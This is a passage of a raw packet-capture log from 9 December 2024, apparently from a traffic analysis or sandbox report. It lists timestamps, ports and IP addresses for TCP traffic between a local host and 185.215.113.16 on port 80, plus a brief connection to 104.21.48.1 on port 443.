                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.344625950 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.344650030 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.344691038 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.446372986 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.446501970 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.446675062 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.446707010 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.447659016 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.447705030 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.448147058 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.448190928 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.448259115 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.448329926 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.450871944 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.451030016 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.451092958 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.451136112 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.453347921 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.453391075 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.453457117 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.453512907 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.455935001 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.455985069 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.456008911 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.456048965 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.458802938 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.458856106 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.458942890 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.459026098 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.460951090 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.460999966 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.461047888 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.461118937 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.463335991 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.463464975 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.463519096 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.465770006 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.465874910 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.465908051 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.465949059 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.468075037 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.468143940 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.468204975 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.468245983 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.470412016 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.470515966 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.470519066 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.470638037 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.472729921 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.472779036 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.472837925 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.472901106 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.475066900 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.475110054 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.475194931 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.475234985 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.477317095 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.477361917 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.477447987 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.477489948 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.479720116 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.479763031 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.479836941 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.479873896 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.481975079 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.482103109 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.482148886 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.484205008 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.484261990 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.484312057 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.484352112 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.486490011 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.486527920 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.486633062 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.486674070 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.488981009 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.489029884 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.489197969 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.489238977 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.491652012 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.491693974 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.491782904 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.492286921 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.493923903 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.493973017 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.494050026 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.494092941 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.496321917 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.496439934 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.496464014 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.496479034 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.498287916 CET49800443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.498313904 CET44349800104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.498372078 CET49800443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.498410940 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.498487949 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.498519897 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.498553038 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.498692036 CET49800443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.498703003 CET44349800104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.501594067 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.501641989 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.501720905 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.501764059 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.502576113 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.502624035 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.502676964 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.502732992 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.504900932 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.504944086 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.505052090 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.505146980 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.507180929 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.507236958 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.507365942 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.507407904 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.509464979 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.509510994 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.509563923 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.509603977 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.511735916 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.511780024 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.511864901 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.511959076 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.514065027 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.514123917 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.514197111 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.514245987 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.516330957 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.516406059 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.516427040 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.516469955 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.518657923 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.518712997 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.518893003 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.519119978 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.520914078 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.520970106 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.521085024 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.521130085 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.523365021 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.523411989 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.523572922 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.523616076 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.525623083 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.525722027 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.525749922 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.525793076 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.527879953 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.527941942 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.528074026 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.528199911 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.531116009 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.531168938 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.531240940 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.531291008 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.534126997 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.534183979 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.534200907 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.534293890 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.536881924 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.536930084 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.537005901 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.537059069 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.539930105 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.539978027 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.540018082 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.541107893 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.541156054 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.541188955 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.541234016 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.542268038 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.542319059 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.542732954 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.542790890 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.543879032 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.543899059 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.543920994 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.543945074 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.546128035 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.546196938 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.546277046 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.546319962 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.548352003 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.548434973 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.548460007 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.548623085 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.550654888 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.550755978 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.550770044 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.550786972 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.552942038 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.553046942 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.553107023 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.555260897 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.555336952 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.555363894 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.555397987 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.557636976 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.557667017 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.557710886 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.559786081 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.559864998 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.559895039 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.560785055 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.562278986 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.562344074 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.562364101 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.562374115 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.564631939 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.564692020 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.564760923 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.564886093 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.638389111 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.638439894 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.638520956 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.638576984 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.638988972 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.639039040 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.639108896 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.639152050 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.640877962 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.640934944 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.641110897 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.641201973 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.642726898 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.642771006 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.642790079 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.642831087 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.646605968 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.646653891 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.646699905 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.646752119 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.647406101 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.647466898 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.647500038 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.647520065 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.648426056 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.648446083 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.648468971 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.648490906 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.650178909 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.650223970 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.650377035 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.650464058 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.651894093 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.652000904 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.652050018 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.653620958 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.653678894 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.653706074 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.653949976 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.655771017 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.655812979 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.655886889 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.655932903 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.657322884 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.657370090 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.657370090 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.657419920 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.658878088 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.658973932 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.659020901 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.660583019 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.660630941 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.660723925 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:19.660849094 CET4979180192.168.2.4185.215.113.16
